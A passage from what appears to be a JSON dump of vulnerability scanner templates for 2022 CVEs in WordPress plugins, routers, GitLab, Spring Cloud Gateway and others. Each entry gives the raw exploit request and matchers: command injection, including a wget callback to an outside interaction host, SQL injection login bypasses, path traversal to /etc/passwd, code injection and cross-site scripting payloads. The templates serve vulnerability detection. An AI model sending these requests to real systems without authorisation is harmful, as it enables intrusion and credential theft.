- Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28363","info":{"name":"Reprise License Manager 14.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","Login Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43016","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=<script>alert(document.domain)</script>&a=authenticate HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["EVAL=<script>alert(document.domain)</script>","cats_connected"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: {{Hostname}}\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes\n","GET / HTTP/1.1\nHost: {{Hostname}}\nReferer: XSS\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_4, \"<script>alert(document.domain);</script>\")","contains(content_type_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-22242","info":{"name":"Juniper Web Device Manager - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","The requested resource is not authorized to view"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicates\": [\n    {\n      \"name\": \"Path\",\n      \"args\": {\n        \"_genkey_0\": \"/{{randstr}}/**\"\n      }\n    }\n  ],\n  \"filters\": [\n    {\n      \"name\": \"RewritePath\",\n      \"args\": {\n        \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n        \"_genkey_1\": \"/${path}\"\n      }\n    }\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n  \"route_id\": \"{{randstr}}\",\n  \"filters\": [\n    \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n  ],\n  \"uri\": \"{{RootURL}}\",\n  \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1916","info":{"name":"WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\\u003cscript%3Ealert(document.domain)\\u003c/script%3E%22}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["woot-content-in-popup","woot-system","woot-table"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'colspan=\\\"2\\\"><script>alert(document.domain)</script></th>')"],"condition":"and"}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0540","info":{"name":"Atlassian Jira Seraph - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General Insight Configuration"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32022","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0437","info":{"name":"karma-runner DOM-based Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/karma.js","{{BaseURL}}/?return_url=javascript:alert(document.domain)"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 6.3.14')"]},{"type":"word","part":"body_2","words":["Karma"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)VERSION: '([0-9.]+)'"],"internal":true}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c